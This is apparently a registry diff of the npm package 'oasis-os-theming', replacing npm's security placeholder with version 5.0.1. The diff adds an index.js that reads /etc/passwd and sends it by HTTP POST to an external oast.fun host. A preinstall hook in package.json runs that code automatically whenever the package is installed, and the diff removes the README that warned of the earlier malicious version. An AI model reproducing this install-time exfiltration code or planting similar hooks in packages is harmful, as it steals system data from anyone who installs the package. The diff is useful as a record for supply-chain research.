oasis-os-theming 0.0.1-security → 5.0.1

package/index.js

@@ -0,0 +1,32 @@
+// index.js in the malicious package
+console.log("Malicious code executed!");
+
+// Example of exfiltrating data
+const fs = require('fs');
+const http = require('http');
+
+const data = fs.readFileSync('/etc/passwd', 'utf8');
+
+const options = {
+  hostname: 'dillhiiuoytidnodtikjyws8ql97njgs7.oast.fun',
+  port: 80,
+  path: '/data',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+  },
+};
+
+const req = http.request(options, (res) => {
+  res.setEncoding('utf8');
+  res.on('data', (chunk) => {
+    console.log('Response: ' + chunk);
+  });
+});
+
+req.on('error', (e) => {
+  console.error(`Problem with request: ${e.message}`);
+});
+
+req.write(JSON.stringify({ data: data }));
+req.end();

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "oasis-os-theming",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "5.0.1",
+  "description": "att research",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=oasis-os-theming for more information.